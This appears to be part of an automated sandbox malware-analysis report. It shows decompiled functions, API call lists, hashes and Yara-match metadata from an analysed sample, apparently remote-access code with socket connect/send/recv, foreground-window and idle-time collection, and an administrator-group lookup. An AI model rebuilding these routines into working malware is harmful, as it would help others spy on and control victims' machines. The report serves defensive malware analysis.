                                      0x00000000
                                      0x0043d4f1
                                      0x0043d4e8

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D4D0
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043D4E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: f32fb965185e7025c02a9de066ce7fde7b36a51aff03085d573f389cae49a2e6
                                      • Instruction ID: 933c0b119ab962c4f2ad9add3893660bb9fd45714bdd6e36b671144c4c9ac32a
                                      • Opcode Fuzzy Hash: f32fb965185e7025c02a9de066ce7fde7b36a51aff03085d573f389cae49a2e6
                                      • Instruction Fuzzy Hash: EDE09A30A402095ADB28AF71AC0BBC73BB86B42748F0444E4A605E1180EAB8DA84CED8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043B66A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0043B66A() {
				intOrPtr _t4;
				void* _t5;
				int _t9;
				void* _t16;
				void* _t17;

				DeleteCriticalSection(0x447bf8);
				_t4 =  *0x447bec; // 0x0
				if(_t4 != 0) {
					__eax = CloseHandle(__eax);
				}
				_t5 =  *0x447be4; // 0x0
				if(_t5 != 0) {
					CloseHandle(_t5);
				}
				L1();
				__imp__#116(_t17);
				E0043E221(0x4479fc);
				E00432E66(0x447854);
				E00432E66(0x447834);
				_t16 =  *0x447824;
				_t9 = VirtualFree(_t16, 0, 0x8000); // executed
				return _t9;
			}








                                      0x0043b66f
                                      0x0043b675
                                      0x0043b67c
                                      0x0043b67f
                                      0x0043b67f
                                      0x0043b685
                                      0x0043b68c
                                      0x0043b68f
                                      0x0043b68f
                                      0x0043b69a
                                      0x00435110
                                      0x0043511c
                                      0x00435124
                                      0x0043512c
                                      0x00435131
                                      0x00435a35
                                      0x00435a3b

                                      APIs
                                      • DeleteCriticalSection.KERNEL32(00447BF8), ref: 0043B66F
                                      • CloseHandle.KERNEL32(00000000), ref: 0043B67F
                                      • CloseHandle.KERNEL32(00000000), ref: 0043B68F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CriticalDeleteSection
                                      • String ID: $xD
                                      • API String ID: 2166061224-1448231257
                                      • Opcode ID: 8ada1ad76b2d4c47cf7a6cc92707faff30cb12cad9a83d80752a4dfb1d545951
                                      • Instruction ID: 47b27e4ade2d7f3ee9bb8a0cca9e8c5947123012384e4dbb89d928222a8dc695
                                      • Opcode Fuzzy Hash: 8ada1ad76b2d4c47cf7a6cc92707faff30cb12cad9a83d80752a4dfb1d545951
                                      • Instruction Fuzzy Hash: EAD05E387083408BFB006F719D1D7163298FB4A7497011077B616C73A1EBACD9028AAE
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043B4FE, Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E0043B4FE(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E004320B4( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E00431E9A(_t63);
						}
						_t23 = E004320B4( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E00431E9A( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E00431E6F(_t63, E0043B424,  &_v12);
						E00431E6F( &(_t59[0xf3]), E0043B491,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E004320B4( &(_t59[0xf1]), 0xffffffff);
						E004320B4( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E0043B6A9(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E00433222(_t66, _t62);
						if(E0043538F( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E00433222(_t66, _t62 + 8);
					if(E0043538F( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}












                                      0x0043b4fe
                                      0x0043b501
                                      0x0043b502
                                      0x0043b506
                                      0x0043b508
                                      0x0043b50f
                                      0x0043b515
                                      0x0043b51c
                                      0x0043b51f
                                      0x0043b53f
                                      0x0043b53f
                                      0x0043b543
                                      0x0043b56c
                                      0x0043b56c
                                      0x0043b576
                                      0x0043b57b
                                      0x0043b57d
                                      0x0043b581
                                      0x0043b581
                                      0x0043b58e
                                      0x0043b593
                                      0x0043b595
                                      0x0043b59d
                                      0x0043b59d
                                      0x0043b5a7
                                      0x0043b5b0
                                      0x0043b5bc
                                      0x0043b5d0
                                      0x0043b5dc
                                      0x0043b5e2
                                      0x0043b5ec
                                      0x0043b5f9
                                      0x0043b5ff
                                      0x0043b605
                                      0x0043b609
                                      0x0043b60d
                                      0x0043b612
                                      0x0043b612
                                      0x0043b545
                                      0x0043b54c
                                      0x0043b55b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043b55b
                                      0x0043b521
                                      0x0043b52b
                                      0x0043b53d
                                      0x0043b55d
                                      0x0043b55e
                                      0x0043b566
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043b53d
                                      0x0043b618

                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0043B50F
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0043B55E
                                        • Part of subcall function 00433222: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00432939,?,?,00000000,exit,00000000,start), ref: 00433247
                                        • Part of subcall function 0043538F: getaddrinfo.WS2_32(?,00000000,00434AC8,00000000), ref: 004353DC
                                        • Part of subcall function 0043538F: socket.WS2_32(00000002,00000001,00000000), ref: 004353F3
                                        • Part of subcall function 0043538F: htons.WS2_32(?), ref: 00435419
                                        • Part of subcall function 0043538F: freeaddrinfo.WS2_32(00000000), ref: 00435429
                                        • Part of subcall function 0043538F: connect.WS2_32(?,?,00000010), ref: 00435435
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0043B5E2
                                      • EnterCriticalSection.KERNEL32(?), ref: 0043B5FF
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0043B609
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                      • String ID:
                                      • API String ID: 4195813003-0
                                      • Opcode ID: bafd075f3bfb7f181c4af04de6456884a8994448d01703dfcde1aed47cdecbc3
                                      • Instruction ID: 4c7cfb3ae0d0cbd2f9a4928935c56e1e138286165cacb5c3eadcd0bb8d7513a0
                                      • Opcode Fuzzy Hash: bafd075f3bfb7f181c4af04de6456884a8994448d01703dfcde1aed47cdecbc3
                                      • Instruction Fuzzy Hash: B131DB712006017BD718EB61CC52FAEB7ACFF08358F40651AF616D2191EB78AA14CBD8
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      Function 00CC7ABD, Relevance: 6.3, APIs: 4, Instructions: 311COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _strrchr
                                      • String ID:
                                      • API String ID: 3213747228-0
                                      • Opcode ID: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
                                      • Instruction ID: 9be59ee06025231af4036994c723fce5bd68af7704dae20c77cd67172a65a256
                                      • Opcode Fuzzy Hash: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
                                      • Instruction Fuzzy Hash: C8B135719082869FDB15CF18C891FBEBBA5FF55310F2442ADE955AB381C6349E41CFA0
                                      Uniqueness

                                      Uniqueness Score: 2.38%

                                      Function 00CC999A, Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00CC6F6D,00000000,?,?,00000000,00000000,00CC6F6D,?,00000000,00000000,00CC6F6D,00000001,?,?,00000001,00CC6F6D), ref: 00CC99E2
                                      • MultiByteToWideChar.KERNEL32(00CC6F6D,00000001,?,?,00000000,?), ref: 00CC9A57
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00CC5CCD), ref: 00CC9A69
                                      • __freea.LIBCMT ref: 00CC9A72
                                        • Part of subcall function 00CC6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,00CC852B,00001000,?,?,?,?,00CC3843), ref: 00CC6F11
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                      • String ID:
                                      • API String ID: 573072132-0
                                      • Opcode ID: c2b52d4a9c4e1d82efda02768948905313335acfae32ddb306bf6b4d04e9e5c3
                                      • Instruction ID: b2b8f57268b9425e952780defc85c395491279acedb1afc98ff4b9c11162c31d
                                      • Opcode Fuzzy Hash: c2b52d4a9c4e1d82efda02768948905313335acfae32ddb306bf6b4d04e9e5c3
                                      • Instruction Fuzzy Hash: 1E31AF7190025AABDF209F65DC89FAF7BA9EF44310F15416CF9249B251D7308E51EBA0
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043D508, Relevance: 6.1, APIs: 4, Instructions: 63memoryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043D508(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E00431052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E00433412(_t37,  &_v580);
				return _t37;
			}












                                      0x0043d515
                                      0x0043d527
                                      0x0043d52c
                                      0x0043d52e
                                      0x0043d531
                                      0x0043d537
                                      0x0043d53f
                                      0x0043d565
                                      0x0043d58c
                                      0x0043d58c
                                      0x0043d595
                                      0x0043d59a
                                      0x0043d59a
                                      0x0043d5a9
                                      0x0043d5b3

                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0043B7F2,?,?,00000001), ref: 0043D55D
                                      • LookupAccountSidW.ADVAPI32(00000000,0043B7F2,?,00000104,?,00000010,?), ref: 0043D582
                                      • GetLastError.KERNEL32(?,?,00000001), ref: 0043D58C
                                      • FreeSid.ADVAPI32(0043B7F2,?,?,00000001), ref: 0043D59A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                      • String ID:
                                      • API String ID: 1866703397-0
                                      • Opcode ID: 1ff3772edfe77558ac74a4e7da237eafaf9df68d3f49777b86cad1902e2c3e2f
                                      • Instruction ID: ae107d6f0f6e0c1babc3378600d51704025441d5e0149d21318e1f24ef22453a
                                      • Opcode Fuzzy Hash: 1ff3772edfe77558ac74a4e7da237eafaf9df68d3f49777b86cad1902e2c3e2f
                                      • Instruction Fuzzy Hash: 7011E6B690021DBADB10DFD1DD89AEEB7BCEB08344F40446AF605E2150E7B49A448BA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043D68F, Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043D68F(WCHAR** __ecx, intOrPtr* __edx) {
				struct HRSRC__* _t13;
				void* _t14;
				unsigned int _t32;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;

				_t35 = __edx;
				_t36 = LoadLibraryExW( *__ecx, 0, 2);
				if(_t36 == 0xffffffff) {
					L4:
					return 0;
				}
				_t13 = FindResourceW(_t36, 1, 0x10);
				if(_t13 == 0) {
					goto L4;
				}
				_t14 = LoadResource(_t36, _t13);
				if(_t14 == 0) {
					goto L4;
				}
				_t32 =  *(_t14 + 0x28);
				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
				 *(_t35 + 8) = _t32 & 1;
				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
				FreeLibrary(_t36);
				return 1;
			}








                                      0x0043d698
                                      0x0043d6a0
                                      0x0043d6a5
                                      0x0043d709
                                      0x00000000
                                      0x0043d709
                                      0x0043d6ae
                                      0x0043d6b6
                                      0x00000000
                                      0x00000000
                                      0x0043d6ba
                                      0x0043d6c2
                                      0x00000000
                                      0x00000000
                                      0x0043d6c7
                                      0x0043d6ca
                                      0x0043d6d0
                                      0x0043d6dc
                                      0x0043d6e0
                                      0x0043d6f5
                                      0x0043d6f9
                                      0x0043d6fc
                                      0x0043d6ff
                                      0x00000000

                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0043C02B), ref: 0043D69A
                                      • FindResourceW.KERNEL32(00000000,00000001,00000010), ref: 0043D6AE
                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0043C02B), ref: 0043D6BA
                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0043C02B), ref: 0043D6FF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadResource$FindFree
                                      • String ID:
                                      • API String ID: 3272429154-0
                                      • Opcode ID: 4af4c89dbb8ce800ae81d067adb8ae99d2a139fdd700a7f25b2fcf42cce500bd
                                      • Instruction ID: 11dfb91c31043533391f8fcc1d5bcf83dcc7211ef3a99a0dc926ecfeb82e6965
                                      • Opcode Fuzzy Hash: 4af4c89dbb8ce800ae81d067adb8ae99d2a139fdd700a7f25b2fcf42cce500bd
                                      • Instruction Fuzzy Hash: 3C01C0B9711A01AFD3088F65AC89A66B7A4FF49310B058239E925C33A0D774D851CBA4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0043D2BD, Relevance: 6.1, APIs: 4, Instructions: 53networksleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 25%
                                      			E0043D2BD(void* __ecx, void* __edx) {
				signed int _v8;
				char _v2056;
				signed int* _t9;
				signed int _t15;
				char* _t16;
				void* _t17;
				void* _t22;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t9 =  &_v8;
				_t23 = __ecx;
				_t22 = __edx;
				__imp__#10(__ecx, 0x4004667f, _t9);
				if(_t9 == 0xffffffff) {
					L4:
					return 0;
				}
				if(_v8 == 0) {
					Sleep(1);
					L7:
					return 1;
				}
				E00431052( &_v2056, 0, 0x800);
				_t15 =  &_v2056;
				__imp__#16(_t23, _t15, 0x800, 0, _t17);
				_v8 = _t15;
				if(_t15 == 0) {
					goto L4;
				}
				_t16 =  &_v2056;
				__imp__#19(_t22, _t16, _t15, 0);
				if(_t16 > 0) {
					goto L7;
				}
				goto L4;
			}











                                      0x0043d2c6
                                      0x0043d2ca
                                      0x0043d2d0
                                      0x0043d2d2
                                      0x0043d2da
                                      0x0043d2e3
                                      0x0043d331
                                      0x00000000
                                      0x0043d331
                                      0x0043d2e9
                                      0x0043d339
                                      0x0043d33f
                                      0x00000000
                                      0x0043d341
                                      0x0043d2fb
                                      0x0043d303
                                      0x0043d30e
                                      0x0043d314
                                      0x0043d31a
                                      0x00000000
                                      0x00000000
                                      0x0043d31f
                                      0x0043d327
                                      0x0043d32f
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0043D2DA
                                      • recv.WS2_32(00000000,?,00000800,00000000), ref: 0043D30E
                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 0043D327
                                      • Sleep.KERNEL32(00000001), ref: 0043D339
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleepioctlsocketrecvsend
                                      • String ID:
                                      • API String ID: 1168213214-0
                                      • Opcode ID: 215c92b921f4120a69030a43f36c7ab48cbae5c2a371c2666334b3f06630295a
                                      • Instruction ID: a2cade29b2996a6fb66cf28084b39332f09f663f746400dd8040a928b7306ff7
                                      • Opcode Fuzzy Hash: 215c92b921f4120a69030a43f36c7ab48cbae5c2a371c2666334b3f06630295a
                                      • Instruction Fuzzy Hash: 3D01D8B5900104BBE7109765AE44FEF32BCFB49311F545072FA05D11C0EBB48E088BAA
                                      Uniqueness

                                      Uniqueness Score: 7.75%

                                      Function 0043444A, Relevance: 6.0, APIs: 4, Instructions: 46UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E0043444A(intOrPtr _a4) {
				char _v8;
				struct tagLASTINPUTINFO _v16;
				signed int _v36;
				char _v40;
				short _v552;

				_v16.cbSize = 8;
				GetLastInputInfo( &_v16);
				_t23 = GetTickCount() - _v16.dwTime;
				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
				E00433412( &_v8,  &_v552);
				_t12 =  &_v36;
				_v36 = _v36 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v40 = 0x15;
				asm("movups [ebp-0x1c], xmm0");
				E004334A6(E0043358E(E0043356D( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
				E00433492( &_v40);
				E00435A2D(_v8);
				return _a4;
			}








                                      0x00434457
                                      0x0043445f
                                      0x0043446b
                                      0x0043448c
                                      0x0043449c
                                      0x004344a4
                                      0x004344a4
                                      0x004344ac
                                      0x004344af
                                      0x004344ba
                                      0x004344cc
                                      0x004344d4
                                      0x004344dc
                                      0x004344e6

                                      APIs
                                      • GetLastInputInfo.USER32(?), ref: 0043445F
                                      • GetTickCount.KERNEL32 ref: 00434465
                                      • GetForegroundWindow.USER32 ref: 00434479
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0043448C
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                      • String ID:
                                      • API String ID: 2567647128-0
                                      • Opcode ID: ea22dbbf77577f099fec1f01b000546680cdc8ef845734e7dffba4a1b18ad34f
                                      • Instruction ID: 2a62c229063cece92effcdf6d3a1565001fb55a410d66a22c468ceda55ec7e8a
                                      • Opcode Fuzzy Hash: ea22dbbf77577f099fec1f01b000546680cdc8ef845734e7dffba4a1b18ad34f
                                      • Instruction Fuzzy Hash: 23115E71D00108ABDB04EFA1DE49ADDB7B9EF58305F4041A9B502B6091EBB8AB44CB54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043CCBA, Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043CCBA(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t1 = _t27 + 0x14; // 0x446564
				_t26 = _t1;
				if( *_t26 == 0) {
					L6:
					_t5 = _t27 + 0x10; // 0x446560
					E0043CEBD(_t5);
					_t6 = _t27 + 4; // 0x446554
					E0043CEBD(_t6);
					_t7 = _t27 + 0xc; // 0x44655c
					E0043CEBD(_t7);
					_t8 = _t27 + 8; // 0x446558
					_t14 = E0043CEBD(_t8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				_t2 = _t27 + 0x18; // 0x0
				if(_t15 ==  *_t2) {
					L5:
					E0043CEBD(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				_t4 = _t27 + 0x10; // 0x0
				SetEvent( *_t4);
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}







                                      0x0043ccbb
                                      0x0043ccbe
                                      0x0043ccbe
                                      0x0043ccc4
                                      0x0043cd05
                                      0x0043cd05
                                      0x0043cd08
                                      0x0043cd0d
                                      0x0043cd10
                                      0x0043cd15
                                      0x0043cd18
                                      0x0043cd1d
                                      0x0043cd20
                                      0x0043cd25
                                      0x00000000
                                      0x0043cd25
                                      0x0043ccc6
                                      0x0043cccc
                                      0x0043cccf
                                      0x0043ccfe
                                      0x0043cd00
                                      0x00000000
                                      0x0043cd00
                                      0x0043ccd5
                                      0x0043cd2b
                                      0x0043cd2b
                                      0x0043ccd7
                                      0x0043ccda
                                      0x0043ccf2
                                      0x0043ccf8
                                      0x0043ccf8
                                      0x00000000

                                      APIs
                                      • GetCurrentThreadId.KERNEL32(?,00000000,0043292E,00000000,exit,00000000,start), ref: 0043CCC6
                                      • SetEvent.KERNEL32(00000000), ref: 0043CCDA
                                      • WaitForSingleObject.KERNEL32(00446564,00001388), ref: 0043CCE7
                                      • TerminateThread.KERNEL32(00446564,000000FE), ref: 0043CCF8
                                      Memory Dump Source
